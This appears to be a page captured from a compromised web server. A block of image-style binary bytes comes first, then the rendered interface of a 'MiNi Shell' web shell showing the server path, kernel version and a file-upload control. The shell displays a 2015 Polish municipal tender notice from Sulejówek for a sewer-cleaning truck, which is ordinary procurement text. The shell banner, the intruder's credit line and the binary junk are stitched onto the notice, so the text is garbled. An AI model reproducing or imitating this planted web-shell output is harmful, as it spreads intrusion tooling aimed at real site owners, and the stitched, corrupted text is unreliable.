JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150804/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150804/197784-N-2015.html

<p class="kh_header"><b>Sulejówek: Zakup samochodu do udrażniania oraz oczyszczania kanałów ściekowych, pompowni, przyłączy w ramach projektu pn. Uporządkowanie gospodarki wodno - ściekowej na terenie Miasta Sulejówek</b><br>
<b>Numer ogłoszenia: 197784 - 2015; data zamieszczenia: 04.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Sulejówek , ul. Dworcowa 55, 05-070 Sulejówek, woj. mazowieckie, tel. 22 7606230, faks 22 7606213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sulejowek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup samochodu do udrażniania oraz oczyszczania kanałów ściekowych, pompowni, przyłączy w ramach projektu pn. Uporządkowanie gospodarki wodno - ściekowej na terenie Miasta Sulejówek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia: 
Przedmiotem zamówienia jest dostawa (1 szt.) fabrycznie nowego samochodu specjalistycznego do udrażniania oraz oczyszczania kanałów ściekowych, pompowni, przyłączy w ramach projektu pn. Uporządkowanie gospodarki wodno-ściekowej na terenie Miasta Sulejówek. 
Samochód przeznaczony do udrażniania mycia wodą pod wysokim ciśnieniem kanałów o średnicy od 50 do 800 mm, z możliwością jednoczesnego odsysania nieczystości do zbiornika osadu, usuwania zanieczyszczeń i osadów z wpustów ulicznych.

PODWOZIE
Rok produkcji: 2015.
Dopuszczalna masa całkowita w zakresie max- 18 t.
Silnik DIESEL o mocy w zakresie 280 - 310 KM.
Wymiary samochodu:
wysokość max z nadbudową: 3300 mm,
długość max: 8000 mm,
szerokość max: 2600 mm,
rozstaw osi 3900 - 4300 mm.
Skrzynia biegów mechaniczna, min. dziewięciobiegowa, w tym bieg wsteczny
Kabina 3 - miejscowa (kierowca + dwóch pasażerów).
Układ kierowniczy ze wspomaganiem.
Regulacja fotela kierowcy.
Fabryczny immobiliser oraz auto - alarm.
Nowy radioodtwarzacz z głośnikami i anteną.
Zamek centralny z pilotem (podział na trzy strefy).
Elektrycznie sterowane szyby.
Norma emisji spalin EURO 6.
Blokada mechaniczna przedniej i tylnej osi.
Klimatyzacja.
Kamera cofania z monitorem w kabinie.
System blokowania się kół podczas hamowania ABS.
Zbiornik paliwa z zamykanym korkiem.
Koła min. 22,5 - opony standard szosowe.
2 akumulatory min. 155 Ah.
Sygnał dźwiękowy cofania.
Kolor kabiny: ciemno niebieski.
Oznakowanie boczne oraz na kabinie zgodne z instrukcją Zamawiającego. Oznakowanie zawierać musi następujące elementy: poniższy napis oraz herb Zamawiającego.

Miejski Zakład Wodociągów i Kanalizacji w Sulejówku
ul. Wodociągowa 10, 05-070 Sulejówek
biuro: ul. Świętochowskiego 4, 05-070 Sulejówek
tel. 22 783 01 65, fax. 22 760 01 44
tel. alarmowy całodobowy 
22 783 71 00
660 784 201
www.mzwiksulejowek.eu

Belka ostrzegawcza z napisem zgodnym z instrukcją Zamawiającego.
Oświetlenie zewnętrzne wg obowiązujących przepisów ruchu drogowego oraz inne elementy wyposażenia wg obowiązujących przepisów ruchu drogowego.
Wyposażenie standardowe pojazdu, tj. koło zapasowe, podnośnik samochodowy, gaśnica proszkowa typu samochodowego o pojemności ok. 4 kg zamontowana w pobliżu siedzenia kierowcy, trójkąt ostrzegawczy, apteczka, fabryczny komplet kluczy, w tym m.in. klucz do kół, dywaniki gumowe w kabinie 
Lusterka wsteczne wg obowiązujących przepisów ruchu drogowego.
ZABUDOWA (NADBUDOWA)

ZBIORNIK
Objętość całkowita zbiornika 7 m3, z podziałem na komorę wody czystej 4 m3 i komorę osadu i wody brudnej 3 m3, obydwie komory zbiornika wyposażone w wskaźniki napełnienia, tylna  dennica zbiornika otwierana i zamykana hydraulicznie, rygle dennicy zabezpieczone przed uszkodzeniem.

UKŁAD WYSOKOCIŚNIENIOWY
Pompa wodna o wydatku w zakresie pracy od 250 do 300 dm3/min, regulowana obrotami pompy, ciśnienie nominalne 16 MPa, elektroniczny licznik czasu pracy pompy wodnej, przedmuch pneumatyczny instalacji wodnej.
Ogrzewanie wodne - wymuszony obieg wody z równoczesnym jej podgrzewaniem, umożliwiającym pracę układu wysokociśnieniowego w temperaturach ujemnych do -15oC, chroniący i zabezpieczający układ węży wysokociśnieniowych przed zamarznięciem.
Sterowanie urządzeniem za pomocą kaset wodoszczelnych zamontowanych w miejscu pracy operatora.
Kaseta główna zamocowana przy dużej wciągarce zapewniająca sterowanie podczas czyszczenia kanałów, tj. zał./wył. ciśnienie wody, obroty silnika +/-, zał./wył. kompresor, otwórz/zamknij zawór wlotowy.
Kontrola: stanu wody, osadu, prędkości obrotowej silnika, długości wsuniętego węża, ręczne sterowanie prędkością i wysuwem węża.
Kaseta na rurze ssącej zapewniająca pracę układu ssąco-tłoczącego i manewrowanie wysięgnikiem.
Kaseta na przewodzie zapewniająca bezpieczną pracę przy rozładunku zbiornika.
Wyciągarka duża: wychylna w promieniu 1250 mm i kącie wychylenia 180° bezstopniowa regulacja wysuwu węża, automatyczne układanie węża oraz o następujących parametrach:
średnica węża min DN 25 mm,
długość węża min L = 120 m,
ciśnienie robocze 250 bar,
ciśnienie rozrywające 625 bar.

Wyciągarka mała: bezstopniowa regulacja wysuwu węża z ręcznym układaniem węża o następujących parametrach:
średnica węża min DN 13 mm,
długość węża min L = 60 m,

UKŁAD SSANIA
Pompa ssąco-tłocząca o wydatku 1000m3/h, zakres pracy od -0,085 MPa do 0,05 MPa, napęd kompresora hydrauliczny, licznik elektroniczny czasu pracy kompresora, możliwość jednoczesnej pracy z pompą wysokociśnieniową bez obniżania parametrów,
Węże ssące średnica min DN 110 mm, długość węży ssących 3 sztuki po 3 m każdy, głębokość ssania min 8 m,
Wysięgnik: teleskopowy, posiadający rurę ssącą DN 110 mm, wysuwany, obracany hydraulicznie, kąt obrotu min 270o, zawór dolnego ssania.
WYPOSAŻENIE DODATKOWE POJAZDU
Zamykane pojemniki ze stali nierdzewnej po obu stronach zbiornika.
Stelaże na węże ssące ze stali nierdzewnej po obu stronach zbiornika.
Pistolet wodny do prac pomocniczych z zestawem 2 szt. dysz o różnych strumieniach.
Zestaw dysz kanałowych.
Rolka górna i dolna do prowadzenia węża długiego.
Lampa do oświetlenia miejsca pracy:
stała,
przenośna.
Światło ostrzegawcze (pojedyncze) na tylnej części zabudowy oświetlenie z tyłu zabudowy.
Oświetlenie z tyłu nadbudowy.
Wyciągarka hydrauliczna o uciągu min 150 kg i długości linki min 10 m.

WYMAGANIA DODATKOWE:
1.2.1. Oferowany pojazd nie może być prototypem. 
1.2.2.Wykonawca:
Przeszkoli 14 pracowników obsługi i służb konserwacyjno - naprawczych Zamawiającego na swój koszt w zakresie obsługi dostarczonego pojazdu oraz wystawi zaświadczenie o ich przeszkoleniu. Szkolenie odbędzie się w terminie uzgodnionym z Zamawiającym w okresie końcówki montażu pojazdu- przed jego dostawą Zamawiającemu. 
Dołączy wykaz czynności obsługowych i drobnych napraw, które mogą 
wykonywać operatorzy bez utraty gwarancji. 
Dołączy wykaz elementów eksploatacyjnych zabudowy niepodlegających 
gwarancji.
1.2.3.Dostarczony Zamawiającemu przedmiot zamówienia - winien posiadać komplet niezbędnych dokumentów wymaganych prawem w języku polskim, o których mowa poniżej: 
Instrukcję obsługi i konserwacji pojazdów w języku polskim, 
Książkę gwarancyjną w języku polskim z zapisami zgodnymi z postanowieniami 
umowy, 
Dokumentację niezbędną do rejestracji przedmiotu zamówienia, jako samochód 
specjalistyczny,
Wykaz dostarczonego sprzętu, stanowiącego wyposażenie przedmiotu zamówienia,
Wykazem adresów punktów serwisowych na terenie kraju, 
Oraz inne niezbędne zezwolenia, pozwolenia, zgody itp. 
W przypadku braku świadectwa homologacji Zamawiający dopuszcza dokument wydany przez stację diagnostyczną - świadectwo o przeprowadzeniu badań technicznych pojazdu i dopuszczenia do ruchu, jako pojazd specjalny. Koszt uzyskania wymienionego dokumentu ponosi Wykonawca. 
1.2.4.W okresie gwarancji wszelkie koszty napraw przedmiotu dostawy oraz koszty dojazdu (transportu) do autoryzowanego serwisu, jeśli naprawa nie może być dokonana w miejscu parkowania pojazdu (teren Miejskiej Oczyszczalni Ścieków w Sulejówku ul. Poligonowa), pokrywa Wykonawca. 
1.2.5.Wykonawca zobowiązany jest podjąć się naprawy gwarancyjnej nie później niż 2 dni od czasu zgłoszenia usterki.
1.2.6.W przypadku naprawy gwarancyjnej trwającej dłużej niż 5 dni roboczych - w przypadku konieczności użycia pojazdu specjalnego do czyszczenia kanalizacji - Dostawca zobowiązany jest do pokrycia kosztów wynajęcia przez Zamawiającego pojazdu specjalnego do czyszczenia kanalizacji. O takiej konieczności Zamawiający powiadomi Dostawcę w formie pisemnej. 
1.2.7.Odbiór przedmiotu umowy odbędzie się na terenie Miejskiej Oczyszczalni Ścieków w Sulejówku ul. Poligonowa 1 w obecności Zamawiającego, Wykonawcy oraz Przedstawiciela Miejskich Zakładów Wodociągów i Kanalizacji w Sulejówku.
1.2.8.Podstawą odbioru przedmiotu zamówienia jest pisemny protokół odbioru przedmiotu umowy podpisany bez zastrzeżeń przez osoby wskazane w pkt. 1.2.7..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.11.40.00-9, 34.14.45.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 12000 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wg formuły spełnia/nie spełnia na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wg formuły spełnia/nie spełnia na podstawie wg formuły spełnia/nie spełnia na podstawie złożonego wykazu dostaw i dowodów, czy dostawy te zostały wykonane należycie, a w tym zakresie wymagane jest, aby Wykonawcy wykazali, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - wykonali co najmniej trzy dostawy, każda na co najmniej  1 samochód specjalny do czyszczenia kanałów . każdy na kwotę co najmniej 500.000,00 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wg formuły spełnia/nie spełnia na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wg formuły spełnia/nie spełnia na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wg formuły spełnia/nie spełnia na podstawie złożonego oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Specyfikację techniczną pojazdu z wyszczególnieniem wszystkich warunków minimalnych podanych przez Zamawiającego potwierdzającą spełnienie tych warunków wraz z podaniem marki pojazdu, typu, producenta, oraz wszystkich podstawowych danych samochodu (jak np.: pojemność, moc silnika, itp.).</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>nie dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - gwarancja - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Istotne postanowienia umowy zawarte zostały w Załączniku Nr 7 do SIWZ. 
2. Wszelkie zmiany i uzupełnienia treści niniejszej umowy wymagają aneksu sporządzonego z 
zachowaniem formy pisemnej pod rygorem nieważności.
3. Zamawiający zastrzega sobie możliwość zmiany treści umowy w przypadkach:
ustawowa zmiana stawki podatku od towaru i usług,
zdarzeń nadzwyczajnych, mających charakter siły wyższej.
4.Zmiana dokonywana jest na pisemny, uzasadniony wniosek jednej ze stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.sulejowek.pl,<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> : Urząd Miasta Sulejówek, 05-070 Sulejówek. ul. Reymonta 43 (wejście od ul. Gdańskiej), pok. 110..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2015 godzina 10:00, miejsce: Urząd Miasta Sulejówek, 05-070 Sulejówek, ul. Dworcowa 55, Biuro Obsługi Klienta..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany ze środków Unii Europejskiej , Program Operacyjny Infrastruktura i Środowisko, , Oś priorytetowa I - -Gospodarka wodno-ściekowa, Działanie 1.1. Gospodarka wodno-ściekowa  w aglomeracjach  powyżej 15 tys. RLM..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com